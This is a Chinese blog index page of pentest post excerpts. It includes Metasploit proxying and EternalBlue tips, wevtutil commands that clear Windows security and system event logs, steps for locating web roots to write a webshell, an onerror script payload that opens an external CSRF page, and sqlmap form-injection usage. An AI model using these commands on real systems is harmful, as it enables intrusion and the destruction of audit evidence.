孤单光量子 - 博客园

CURL使用

摘要：模拟 multipart/form-data 形式的 form 上传文件 curl -F "filename=@/home/test/file.tar.gz" http://localhost/action.php 获取web服务器支持的方法 -i 显示响应中的http头还包含报文中的内容 -X 阅读全文

posted @ 2021-06-29 09:18 孤单光量子阅读(43) 评论(0) 推荐(0) 编辑

msf使用技巧

摘要：将msf代理到内网中，使用命令 1 setg Proxies socks5:你的socksIP:端口 MSF 扫描到的资产或者漏洞保存在数据库，方便我们梳理，常用的就是这两个语句： services 查看扫描到的资产IP及端口 vulns 查看扫描到的漏洞资产关于永恒之蓝的利用如果目标操作系统是阅读全文

posted @ 2021-06-26 15:47 孤单光量子阅读(323) 评论(0) 推荐(0) 编辑

红队绕过日志检查

摘要：命令：wevtutil cl 日志类型 wevtutil cl security wevtutil cl Setup wevtutil cl System wevtutil cl Aplication wevtutil cl Forwarded Events 使用Phantom 工具该脚本遍历事件阅读全文

posted @ 2021-06-25 21:54 孤单光量子阅读(58) 评论(0) 推荐(0) 编辑

命令执行写webshell

摘要：寻找web的路径 ( 1 ) 文件查找法 linux: find / -name index.php find / -name index.* windows: for /r d:/ %i in (index.php) do @echo %i for /r d:/ %i in (index.*) d 阅读全文

posted @ 2021-06-23 22:41 孤单光量子阅读(560) 评论(0) 推荐(0) 编辑

Metasploit实战技巧

摘要： exploit-z 表示在完成 exploit 之后不会与会话进行交互。完成 exploit 之后，可以使用 sessions 查看会话信息。 session -u ID 将shell转变为meterpreter db_nmap -sT -sV 192.168.0.103 -p 1433 扫描目标阅读全文

posted @ 2021-06-23 22:05 孤单光量子阅读(89) 评论(0) 推荐(0) 编辑

Linux文件描述符与重定向

摘要：文件描述符可以理解为linux跟踪打开文件，而分配的一个数字，这个数字有点类似c语言操作文件时候的句柄，通过句柄就可以实现文件的读写操作。当Linux启动的时候会默认打开三个文件描述符，分别是：标准输入 standard input 0 （默认设备键盘）标准输出 standard output 阅读全文

posted @ 2020-09-03 09:17 孤单光量子阅读(229) 评论(0) 推荐(0) 编辑

使用script打开页面

摘要： <script src="x" onerror=javascript:window.open("http://192.168.38.1/csrf.html")></script> 阅读全文

posted @ 2020-08-16 18:47 孤单光量子阅读(137) 评论(0) 推荐(0) 编辑

sqlmap 的 --forms之理解

摘要：对于一个页面的form表单中的数据进行注入测试方法有三个 ①burp抓包将数据储存为文本文件然后 sqlmap中使用 -r 参数进行测试 ②使用 --data参数，将数据进行测试 ③直接使用--forms参数，sqlmap会自动从-u中的url获取页面中的表单进行测试。阅读全文

posted @ 2020-07-27 08:48 孤单光量子阅读(1860) 评论(0) 推荐(1) 编辑

MySql 错误：In aggregated query without GROUP BY, expression #1 of SELECT list contains....

摘要：前段时间做sql注入的时候使用group_concat时，出现标题上的错误。经查阅一位大佬的博客，成功解决！故写此博文！当mysql的sql_mode是only_full_group_by的时候，在不使用group by 并且select后面出现聚集函数的话，那么所有被select的都应该是聚集阅读全文

posted @ 2020-07-22 09:19 孤单光量子阅读(4733) 评论(0) 推荐(0) 编辑